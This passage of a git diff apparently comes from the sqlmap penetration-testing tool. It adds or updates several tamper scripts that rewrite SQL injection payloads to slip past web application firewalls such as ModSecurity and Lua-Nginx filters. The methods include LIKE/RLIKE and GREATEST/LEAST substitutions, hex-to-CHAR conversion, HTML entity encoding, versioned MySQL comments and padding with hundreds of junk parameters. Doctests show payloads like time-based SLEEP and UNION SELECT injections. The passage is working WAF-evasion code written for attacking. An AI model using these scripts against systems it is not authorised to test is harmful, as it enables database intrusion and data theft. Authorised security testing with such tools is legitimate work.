occurrences of operator equal ('=') with 'LIKE' counterpart Tested against: * Microsoft SQL Server 2005 @@ -34,17 +27,14 @@ def tamper(payload, **kwargs): filter the equal character ('=') * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) 
databases - """ - def process(match): - word = match.group() - word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "") - - return word + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id LIKE 1' + """ retVal = payload if payload: - retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal) + retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) return retVal diff --git a/tamper/equaltorlike.py b/tamper/equaltorlike.py new file mode 100644 index 00000000000..0bad97d1fdc --- /dev/null +++ b/tamper/equaltorlike.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart + + Tested against: + * MySQL 4, 5.0 and 5.5 + + Notes: + * Useful to bypass weak and bespoke web application firewalls that + filter the equal character ('=') + + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id RLIKE 1' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"\s*=\s*", " RLIKE ", retVal) + + return retVal diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py new file mode 100644 index 00000000000..aba948a065f --- /dev/null +++ b/tamper/escapequotes.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Slash escape single and double quotes (e.g. ' -> \') + + >>> tamper('1" AND SLEEP(5)#') + '1\\\\" AND SLEEP(5)#' + """ + + return payload.replace("'", "\\'").replace('"', '\\"') diff --git a/tamper/greatest.py b/tamper/greatest.py index 8b0abe0586f..742b090c1b6 100644 --- a/tamper/greatest.py +++ b/tamper/greatest.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -18,10 +18,6 @@ def tamper(payload, **kwargs): """ Replaces greater than operator ('>') with 'GREATEST' counterpart - Example: - * Input: 'A > B' - * Output: 'GREATEST(A, B + 1) = A' - Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g @@ -32,15 +28,18 @@ def tamper(payload, **kwargs): filter the greater than character * The GREATEST clause is a widespread SQL command. 
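A quick standalone check of the equivalence used here: for integer operands, GREATEST(A, B + 1) = A holds exactly when A >= B + 1, that is, when A > B. A minimal Python sketch of that reasoning (the helper name is illustrative only, not part of sqlmap):

    def greatest_rewrite_holds(a, b):
        # GREATEST(A, B + 1) = A  <=>  A >= B + 1  <=>  A > B (for integers)
        return (max(a, b + 1) == a) == (a > b)

    assert all(greatest_rewrite_holds(a, b) for a in range(-3, 4) for b in range(-3, 4))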
Hence, this tamper script should work against majority of databases + + >>> tamper('1 AND A > B') + '1 AND GREATEST(A,B+1)=A' """ retVal = payload if payload: - match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) + match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) if match: - _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4)) + _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3)) retVal = retVal.replace(match.group(0), _) return retVal diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py index 6a2d18c7502..cb8dc946f7a 100644 --- a/tamper/halfversionedmorekeywords.py +++ b/tamper/halfversionedmorekeywords.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -21,11 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds versioned MySQL comment before each keyword - - Example: - * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa - * Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa + Adds (MySQL) versioned comment before each keyword Requirement: * MySQL < 5.1 @@ -38,6 +34,9 @@ def tamper(payload, **kwargs): back-end database management system is MySQL * Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html + + >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") + "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" """ def process(match): @@ -50,7 +49,7 @@ def process(match): retVal = payload if payload: - retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) + retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal) retVal = retVal.replace(" /*!0", "/*!0") return retVal diff --git a/tamper/hex2char.py b/tamper/hex2char.py new file mode 100644 index 00000000000..89bcc32c8c6 --- /dev/null +++ b/tamper/hex2char.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.convert import decodeHex +from lib.core.convert import getOrds +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) 
counterpart + + Requirement: + * MySQL + + Tested against: + * MySQL 4, 5.0 and 5.5 + + Notes: + * Useful in cases when web application does the upper casing + + >>> tamper('SELECT 0xdeadbeef') + 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal): + if len(match.group(1)) > 2: + result = "CONCAT(%s)" % ','.join("CHAR(%d)" % _ for _ in getOrds(decodeHex(match.group(1)))) + else: + result = "CHAR(%d)" % ord(decodeHex(match.group(1))) + retVal = retVal.replace(match.group(0), result) + + return retVal diff --git a/tamper/hexentities.py b/tamper/hexentities.py new file mode 100644 index 00000000000..9b060673a04 --- /dev/null +++ b/tamper/hexentities.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + HTML encode in hexadecimal (using code points) all characters (e.g. ' -> &#x27;) + + >>> tamper("1' AND SLEEP(5)#") + '&#x31;&#x27;&#x20;&#x41;&#x4e;&#x44;&#x20;&#x53;&#x4c;&#x45;&#x45;&#x50;&#x28;&#x35;&#x29;&#x23;' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + retVal += "&#x%s;" % format(ord(payload[i]), "x") + i += 1 + + return retVal diff --git a/tamper/htmlencode.py b/tamper/htmlencode.py new file mode 100644 index 00000000000..ce09386be77 --- /dev/null +++ b/tamper/htmlencode.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + HTML encode (using code points) all non-alphanumeric characters (e.g. 
' -> &#39;) + + >>> tamper("1' AND SLEEP(5)#") + '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;' + >>> tamper("1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;") + '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;' + """ + + if payload: + payload = re.sub(r"&#(\d+);", lambda match: chr(int(match.group(1))), payload) # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5203 + payload = re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) + + return payload diff --git a/tamper/if2case.py b/tamper/if2case.py new file mode 100644 index 00000000000..e43c4f8f217 --- /dev/null +++ b/tamper/if2case.py @@ -0,0 +1,71 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.compat import xrange +from lib.core.enums import PRIORITY +from lib.core.settings import REPLACEMENT_MARKER + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart + + Requirement: + * MySQL + * SQLite (possibly) + * SAP MaxDB (possibly) + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that filter the IF() functions + + >>> tamper('IF(1, 2, 3)') + 'CASE WHEN (1) THEN (2) ELSE (3) END' + >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') + 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' + """ + + if payload and payload.find("IF") > -1: + payload = payload.replace("()", REPLACEMENT_MARKER) + while payload.find("IF(") > -1: + index = payload.find("IF(") + depth = 1 + commas, end = [], None + + for i in xrange(index + len("IF("), len(payload)): + if depth == 1 and payload[i] == ',': + commas.append(i) + + elif depth == 1 and payload[i] == ')': + end = i + break + + elif payload[i] == '(': + depth += 1 + + elif payload[i] == ')': + depth -= 1 + + if len(commas) == 2 and end: + a = payload[index + len("IF("):commas[0]].strip("()") + b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") + c = payload[commas[1] + 1:end].lstrip().strip("()") + newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) + payload = payload[:index] + newVal + payload[end + 1:] + else: + break + + payload = payload.replace(REPLACEMENT_MARKER, "()") + + return payload diff --git a/tamper/ifnull2casewhenisnull.py b/tamper/ifnull2casewhenisnull.py new file mode 100644 index 00000000000..36c8eb9462d --- /dev/null +++ b/tamper/ifnull2casewhenisnull.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.compat import xrange +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart + + Requirement: + * MySQL + * SQLite (possibly) + * SAP MaxDB (possibly) + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that filter the IFNULL() functions + + >>> tamper('IFNULL(1, 2)') + 'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END' + """ + + if payload and payload.find("IFNULL") > -1: + while payload.find("IFNULL(") > -1: + index = payload.find("IFNULL(") + depth = 1 + comma, end = None, None + + for i in xrange(index + len("IFNULL("), len(payload)): + if depth == 1 and payload[i] == ',': + comma = i + + elif depth == 1 and 
payload[i] == ')': + end = i + break + + elif payload[i] == '(': + depth += 1 + + elif payload[i] == ')': + depth -= 1 + + if comma and end: + _ = payload[index + len("IFNULL("):comma] + __ = payload[comma + 1:end].lstrip() + newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _) + payload = payload[:index] + newVal + payload[end + 1:] + else: + break + + return payload diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py index c8e2fd44af9..a6399f290dd 100644 --- a/tamper/ifnull2ifisnull.py +++ b/tamper/ifnull2ifisnull.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST @@ -14,11 +15,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' - - Example: - * Input: IFNULL(1, 2) - * Output: IF(ISNULL(1), 2, 1) + Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart Requirement: * MySQL @@ -31,6 +28,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function + + >>> tamper('IFNULL(1, 2)') + 'IF(ISNULL(1),2,1)' """ if payload and payload.find("IFNULL") > -1: @@ -55,7 +55,7 @@ def tamper(payload, **kwargs): if comma and end: _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end] + __ = payload[comma + 1:end].lstrip() newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) payload = payload[:index] + newVal + payload[end + 1:] else: diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py new file mode 100644 index 00000000000..bb977b90229 --- /dev/null +++ b/tamper/informationschemacomment.py @@ -0,0 +1,27 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def tamper(payload, **kwargs): + """ + Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier + + >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') + 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload) + + return retVal diff --git a/tamper/least.py b/tamper/least.py new file mode 100644 index 00000000000..a4f84a5a9a3 --- /dev/null +++ b/tamper/least.py @@ -0,0 +1,45 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces greater than operator ('>') with 'LEAST' counterpart + + Tested against: + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass weak and bespoke web application firewalls that + filter the greater than character + * The LEAST clause is a widespread SQL command. 
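The LEAST variant relies on the mirror equivalence: for integer operands, LEAST(A, B + 1) = B + 1 holds exactly when B + 1 <= A, that is, when A > B. A minimal Python sketch (helper name illustrative only, not part of sqlmap):

    def least_rewrite_holds(a, b):
        # LEAST(A, B + 1) = B + 1  <=>  B + 1 <= A  <=>  A > B (for integers)
        return (min(a, b + 1) == b + 1) == (a > b)

    assert all(least_rewrite_holds(a, b) for a in range(-3, 4) for b in range(-3, 4))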
Hence, this + tamper script should work against majority of databases + + >>> tamper('1 AND A > B') + '1 AND LEAST(A,B+1)=B+1' + """ + + retVal = payload + + if payload: + match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) + + if match: + _ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4)) + retVal = retVal.replace(match.group(0), _) + + return retVal diff --git a/tamper/lowercase.py b/tamper/lowercase.py new file mode 100644 index 00000000000..ab0fa2e9a0c --- /dev/null +++ b/tamper/lowercase.py @@ -0,0 +1,45 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each keyword character with lower case value (e.g. SELECT -> select) + + Tested against: + * Microsoft SQL Server 2005 + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that has poorly written permissive regular expressions + + >>> tamper('INSERT') + 'insert' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): + word = match.group() + + if word.upper() in kb.keywords: + retVal = retVal.replace(word, word.lower()) + + return retVal diff --git a/tamper/luanginx.py b/tamper/luanginx.py new file mode 100644 index 00000000000..aca3e3a1b10 --- /dev/null +++ b/tamper/luanginx.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import random +import string + +from lib.core.compat import xrange +from lib.core.enums import HINT +from lib.core.enums import PRIORITY +from lib.core.settings import DEFAULT_GET_POST_DELIMITER + +__priority__ = PRIORITY.NORMAL + +def tamper(payload, **kwargs): + """ + LUA-Nginx WAFs Bypass (e.g. 
Cloudflare) + + Reference: + * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/ + + Notes: + * Lua-Nginx WAFs do not support processing of more than 100 parameters + + >>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload) + '34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1' + """ + + hints = kwargs.get("hints", {}) + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + + hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(500)) + + return payload diff --git a/tamper/luanginxmore.py b/tamper/luanginxmore.py new file mode 100644 index 00000000000..1d360db1005 --- /dev/null +++ b/tamper/luanginxmore.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import random +import string +import os + +from lib.core.compat import xrange +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import HINT +from lib.core.enums import PRIORITY +from lib.core.settings import DEFAULT_GET_POST_DELIMITER + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run on POST requests" % (os.path.basename(__file__).split(".")[0])) + +def tamper(payload, **kwargs): + """ + LUA-Nginx WAFs Bypass (e.g. 
Cloudflare) with 4.2 million parameters + + Reference: + * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/ + + Notes: + * Lua-Nginx WAFs do not support processing of huge number of parameters + """ + + hints = kwargs.get("hints", {}) + delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER) + + hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(4194304)) + + return payload diff --git a/tamper/misunion.py b/tamper/misunion.py new file mode 100644 index 00000000000..062f049cc0c --- /dev/null +++ b/tamper/misunion.py @@ -0,0 +1,36 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces instances of UNION with -.1UNION + + Requirement: + * MySQL + + Notes: + * Reference: https://raw.githubusercontent.com/y0unge/Notes/master/SQL%20Injection%20WAF%20Bypassing%20shortcut.pdf + + >>> tamper('1 UNION ALL SELECT') + '1-.1UNION ALL SELECT' + >>> tamper('1" UNION ALL SELECT') + '1"-.1UNION ALL SELECT' + """ + + return re.sub(r"(?i)\s+(UNION )", r"-.1\g<1>", payload) if payload else payload diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index 47ada21c1fc..458497706cd 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -1,25 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os + from lib.core.common import randomInt +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHER def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): """ - Embraces complete query with versioned comment - - Example: - * Input: 1 AND 2>1-- - * Output: 1 /*!30000AND 2>1*/-- + Embraces complete query with (MySQL) versioned comment Requirement: * MySQL @@ -28,7 +28,12 @@ def tamper(payload, **kwargs): * MySQL 5.0 Notes: - * Useful to bypass ModSecurity WAF/IDS + * Useful to bypass ModSecurity WAF + + >>> import random + >>> random.seed(0) + >>> tamper('1 AND 2>1--') + '1 /*!30963AND 2>1*/--' """ retVal = payload diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index f1548db7896..0cf1dd511aa 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -1,24 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = 
PRIORITY.HIGHER def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): """ - Embraces complete query with zero-versioned comment - - Example: - * Input: 1 AND 2>1-- - * Output: 1 /*!00000AND 2>1*/-- + Embraces complete query with (MySQL) zero-versioned comment Requirement: * MySQL @@ -27,7 +27,10 @@ def tamper(payload, **kwargs): * MySQL 5.0 Notes: - * Useful to bypass ModSecurity WAF/IDS + * Useful to bypass ModSecurity WAF + + >>> tamper('1 AND 2>1--') + '1 /*!00000AND 2>1*/--' """ retVal = payload diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index ec4303b7897..ab02a0c911c 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -1,14 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import random import re from lib.core.data import kb +from lib.core.datatype import OrderedSet from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL @@ -18,32 +19,32 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds multiple spaces around SQL keywords - - Example: - * Input: UNION SELECT - * Output: UNION SELECT + Adds multiple spaces (' ') around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt + + >>> random.seed(0) + >>> tamper('1 UNION SELECT foobar') + '1 UNION SELECT foobar' """ retVal = payload if payload: - words = set() + words = OrderedSet() - for match in re.finditer(r"[A-Za-z_]+", payload): + for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() if word.upper() in kb.keywords: words.add(word) for word in words: - retVal = re.sub("(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal) - retVal = re.sub("(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal) + retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, 